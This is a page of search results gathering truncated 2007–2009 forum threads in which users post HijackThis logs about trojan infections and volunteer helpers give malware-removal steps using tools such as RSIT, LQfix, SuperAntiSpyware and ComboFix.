C:\Program Files\mcafee.com\personal firewall\MPfTray.exe
C:\Program Files\mcafee.com\antivirus\mcvsescn.exe
C:\Program Files\Common Files\AOL\1161914306\ee\aolsoftware.exe
C:\Program Files\Common Files\AOL\1161914306\ee\services\safetyCore\ver210_5_2_1\AOLSP Scheduler.exe
C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
C:\Program Files\Common Files\AOL\1161914306\ee\SSCEvtHdlr.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
C:\Program Files\Evidence Eliminator\ee.exe
C:\Program Files\America Online 8.0\aoltray.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\... Read more

A:Solved: got rid of trojan vx downloader,pls chk hijackthis

14 more replies
Answer Match 61.32%

Hello,
I have a trojan virus called Generic.dx!fhb which is located here C:\Windows\System32\iuypifmo.dll
My McAfee says it found the virus and quarantined it but it keeps coming back over and over. It halts my PC from working continuously. I am lucky to be here now posting this request. I have to restart numerous times.

I have attached the log from Hijackthis. Please help me!!!!
My Hijackthis log is sooo big that it would not allow me to paste it in this.
I had to add it as an attachment.
 

More replies
Answer Match 60.9%

Hello

Below is my hijackthis logfile. I thought it best to submit it to the professionals such as yourselves for a report on its status. Recently I attempted to download a program on a new install of windows; the minute I did I got attacked with a barrage of viruses, this kryptic virus was copying itself and downloading viruses by creating false files and infecting existing files all over my computer. Within seconds I had over 20 infections all over my computer, even on alternate hard drives. I did a full system scan using nod32 and then did a system restore. Then I turned off system restore, and used the best virus suite I know of and that is Nod 32 from eset to do another in depth scan. Following that scan there were no more reports of viruses. I notice it can't open all the files because sometimes on the log it says error cannot open file. Any advice on an offline virus scanner would be awesome. Anyway here is my log file and any help is greatly appreciated. Even if it isn't related to my log file but general advice regarding my infection period.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:11:35 PM, on 30/12/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Common Files\Inte... Read more

A:hijackthis logfile - Kryptic Trojan Downloader

Welcome to the BleepingComputer Forums.

Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt.

Thank you for your patience.

Please see Preparation Guide for use before posting about your potential Malware problem.

If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped.

While we are working on your HijackThis log, please:
Reply to this thread; do not start another!
Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so.
Do not run any other tool until instructed to do so!
Let me know if any of the links do not work or if any of the tools do not work.
Tell me about problems or symptoms that occur during the fix.
Do not run any other programs or open any other windows while doing a fix.
Ask any questions that you have regarding the fix(es... Read more

2 more replies
Answer Match 60.9%

Logfile of HijackThis v1.99.1
Scan saved at 12:52:24 PM, on 5/9/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\System32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\Explorer.EXE
C:\windows\system\hpsysdrv.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\ps2.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\WINDOWS\system32\igfxtray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\AIM\aim.exe
C:\Pr... Read more

A:I ran hijackthis and want to remove trojan generic dx virus. The log file is below

Please uncheck wordwrap in notepad/format

http://users.pandora.be/bluepatchy/miekiemoes/tools/LQfix.exe to download LQfix.exe and Save it to your desktop.
Doubleclick LQfix.exe and click install.
Leave the default settings. If you change them, the fix will fail.
Make sure 'Launch LQfix' is checked. After clicking finish in the install, the fix will start.
Follow the prompts on the screen.
Your system will reboot afterwards.
Please be patient after reboot, because there is a script running in the background.
=======================
Download Superantispyware (SAS)

http://www.superantispyware.com/superantispywarefreevspro.html

Install it and double-click the icon on your desktop to run it.
It will ask if you want to update the program definitions, click Yes.
Under Configuration and Preferences, click the Preferences button.
Click the Scanning Control tab.
Under Scanner Options make sure the following are checked:
o Close browsers before scanning
o Scan for tracking cookies
o Terminate memory threats before quarantining.
o Please leave the others unchecked.
o Click the Close button to leave the control center screen.
On the main screen, under Scan for Harmful Software click Scan your computer.
On the left check C:\Fixed Drive.
On the right, under Complete Scan, choose Perform Complete Scan.
Click Next to start the scan. Please be patient while it scans your computer.
After the scan is complete a summary box will appear.... Read more

1 more replies
Answer Match 60.9%

Hi. Recently I got some kind of Trojan.Generic virus and it's been slowing down my PC quite a lot. Taking about 5 minutes just to start up my computer. I have a HiJackThis log if anyone can please help.

Thanks and any help is deeply appreciated !
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:25:03, on 23/10/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\arservice.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\PROGRA~1\AVG\AVG8\avgnsx.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\AVG\AVG8\avgemc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\AVG\AVG8\avgcsrvx.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\A... Read more

A:Trojan.Generic - Computer slowing down (HiJackThis Log included)

16 more replies
Answer Match 60.48%

i started dealing w/ the popups a week or so ago, my sister was visiting a page for myspace layouts, can't remember the name and clicked on a link when the firewall popped up saying it stopped trojan from downloading. however, that's when the popups started. i ran ad aware, remove it pro 4.1 and ran norton antivirus (subscription expired months ago tho). did this several times, sometimes in safe mode, several things were removed including trojans, but the popups remained. mainly they were from outerinfo and winantispyware pro...but there are a lot of others from random websites. i found out how to uninstall outerinfo on their website, and have had no more problems with it, but the others keep coming. also, i noticed under the privacy tab of internet options the settings keep resetting to "accept all cookies". i've changed it to medium-high several times, it keeps resetting. a few times i have received a "buffer runtime error" message and the desktop reloads, sort of acts like the computer restarts but all of the programs stay on the screen.

panda log:


Incident Status Location

Adware:Adware/DnsInsider ... Read more

A:popups; Trj/Downloader.OZB, Generic Malware, Trj/Downloader.PCQ

Hello, and Welcome to TSF.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.

Once we've gotten a handle on the infection, we'll uninstall Norton (or you should renew the subscription) and get you a free Anti-Virus so the machine is protected. Having an outdated Anti-Virus program is almost like not having one at all.

---------------------------------------------------------------------------------------------
Download this file - http://download.bleepingcomputer.com...a/ComboFix.exe

* IMPORTANT !!! Place combofix.exe on your Desktop


Disconnect from the internet....pull the plug!
Go to -> Run -> paste in the following single line command & click OK

"%userprofile%\desktop\combofix.exe" /killall


Follow the prompts. Type "1" and press Enter to begin the scan.
Your desktop may go blank. ... Read more

19 more replies